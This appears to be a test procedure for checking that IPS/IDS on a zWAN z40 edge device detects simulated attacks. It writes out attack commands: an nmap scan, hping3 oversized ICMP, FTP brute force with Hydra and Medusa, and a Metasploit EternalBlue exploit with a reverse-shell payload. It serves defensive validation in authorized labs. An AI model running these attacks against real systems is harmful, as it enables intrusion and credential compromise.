Objective

Validate that IPS/IDS features on the zWAN device are properly configured, enabled, and capable of detecting and alerting on a variety of simulated malicious activities using free, widely available tools on both Linux and Windows test clients.

Prerequisites

Admin access to the zWAN Director UI (or local UI) managing the z40 device.

Test client machines connected on the z40 LAN (wired or Wi-Fi).

IPS/IDS enabled and signature repository configured in the Director.

Authorized testing environment and permission to conduct security testing.

Test Setup and Configuration

1. Enable IPS/IDS and Configure Network Settings & Policy Priorities

Login to zWAN Director UI.

Navigate: Edge Controllers > [Your z40 Device] > Security > IPS/IDS > Configuration tab.

Toggle the Enabled switch to ON.

In the Networking section:

– Enter the LAN subnet(s) in the HOME NET field (e.g., 192.168.1.0/24).

– Enter the EXTERNAL NET as !$HOME_NET to include all networks outside LAN.

– Click the Save button to save network settings.

Under Policy Priorities, toggle Drop for:

– High Priority Attacks

– Medium Priority Attacks

– Low Priority Attacks (optional)

Click Activate Changes to apply the configuration.

2. Add IPS Signature Repository

Still under the Configuration tab, click Add Repository.

For URL, enter: https://rules.emergingthreats.net/open/suricata-5.0.0/emerging.rules.tar.gz

Add a description (e.g., “Emerging Threats Rules”).

Enable the repository toggle and click Add.

Click Activate Changes again to download and apply signatures.

3. Generate IPS Alerts Using Free Tools

Safety and Legal Disclaimer:

 

• Only perform tests in controlled, authorized environments such as your POC or lab setups.
• Obtain explicit permission to run active or intrusive tests against all targets.
• Avoid any impact on production networks or unintended targets.
• Use non-destructive payloads where possible and be prepared to halt tests if issues arise.
• Respect all laws and organizational policies related to penetration testing and network scanning.

A. Nmap Network Scan (Reconnaissance Detection)

Nmap performs network discovery and vulnerability scanning, which should trigger IPS detection of scanning activities.

Linux:

sudo apt-get install nmap

nmap -A <target_ip>

Windows:

Download from https://nmap.org/download.html

Open Command Prompt and run:

nmap -A <target_ip>

B. Ping of Death (Malformed ICMP Packets)

This test sends oversized or malformed ICMP packets that IPS systems commonly detect.

Linux:

sudo apt-get install hping3

sudo hping3 –icmp –data 65500 <target_ip>

Windows:

Use built-in ping with large packet size (max 65500 bytes):

ping -l 65500 <target_ip>

Note: Windows ping may not generate perfectly malformed packets but can still trigger alerts.

C. SQL Injection Test (Web Application Vulnerability)

Linux & Windows:

Download OWASP ZAP: https://www.zaproxy.org/download/

Run OWASP ZAP, enter the target web app URL, and start an Active Scan to generate SQLi test traffic.

D. FTP Brute Force Test

Linux (Hydra):

sudo apt-get install hydra

hydra -l testuser -P /usr/share/wordlists/rockyou.txt ftp://<target_ip>

Windows (Medusa):

1. Download Medusa for Windows from a reputable source (e.g., GitHub forks https://github.com/jmk-foofus/medusa).
2. Extract contents to C:\medusa\.
3. Prepare username file (e.g., user.txt) with target usernames (e.g., testuser).
4. Prepare password list file (e.g., rockyou.txt).
5. Open Command Prompt and navigate: cd C:\medusa\
6. Run Medusa:

medusa.exe -h <target_ip> -u testuser -P rockyou.txt -M ftp -t 4

E. Metasploit Exploit Simulation

Linux:

sudo apt update

sudo apt install metasploit-framework

msfconsole

Windows:

Download from Rapid7 https://www.rapid7.com/products/metasploit/download/ and install.

Launch Metasploit Console.

Run SMB Exploit:

search smb

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS <target_ip>

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST <your_ip>

check

exploit

Note: Use only in authorized test environments.

Alternative less intrusive auxiliary module:

use auxiliary/scanner/icmp/icmp_sweep

set RHOSTS <target_subnet>

run

4. View IPS Alerts

In zWAN Director UI, navigate to IPS/IDS > Alerts tab.

Verify alerts show details including:

– Timestamp

– Priority

– Class

– Source and destination IPs and ports

– Signature ID (SID)

– Signature description

5. Review Logs

Use Analytics > Statistics > Logs and Events tab for detailed IPS logs.

Validation Criteria

IPS/IDS enabled with correct network scopes.

Signature repository active and updated.

Alerts generated for all simulated malicious traffic scenarios.

Alerts contain actionable details for forensic analysis.

Safety & Legal Reminders:

• Perform tests only in authorized lab or POC environments.
• Obtain explicit permission before running intrusive scans or exploits.
• Avoid any tests on production or unapproved networks.
• Use non-destructive payloads when possible.
• Have a rollback plan and monitor systems for unexpected behavior.